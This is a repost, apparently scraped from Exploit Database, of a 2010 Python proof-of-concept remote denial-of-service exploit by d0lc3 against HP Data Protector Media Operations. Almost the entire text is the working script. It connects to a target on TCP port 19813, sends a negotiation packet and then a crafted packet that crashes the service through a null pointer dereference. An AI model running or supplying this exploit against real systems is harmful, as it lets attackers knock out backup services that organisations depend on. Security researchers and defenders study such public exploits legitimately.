HP Data Protector Media Operations – Null Pointer Dereference Remote Denial of Service

• Exploit Database
• 152 阅读

• 作者： d0lc3
  日期： 2010-10-06
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/15214/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  #!/usr/bin/python   import socket,struct,sys,os   SIGN=0x04030201 cmd=0x01000000   def main(): if len(sys.argv)!=2: print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n" sys.exit(0) else: host=sys.argv[1],19813 #default port TCP/19813   if sys.platform=="win32": os.system("cls") else: os.system("clear") s=socket.socket() try: s.connect(host) s.recv(1024) except: print"[x] Error connecting to remote host! This is g00d :D." sys.exit(0) print"[+] Building crafted packets..." #packet negotiation request pktnego=struct.pack(">L",cmd+0x1) #+0 pktnego+=struct.pack("<L",0x00000000) #+4 pktnego+=struct.pack("<L",SIGN) #+8 (signature) #packet crash pkt1=struct.pack("<L",cmd+0x2) pkt1+=struct.pack(">L",0x00000001) # != 0x0 pkt1+=struct.pack("<L",SIGN) #end print"[+] Negotiation." s.send(pktnego) s.recv(1024) s.send(pkt1)#crash! s.close()   if __name__=="__main__": main() #PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip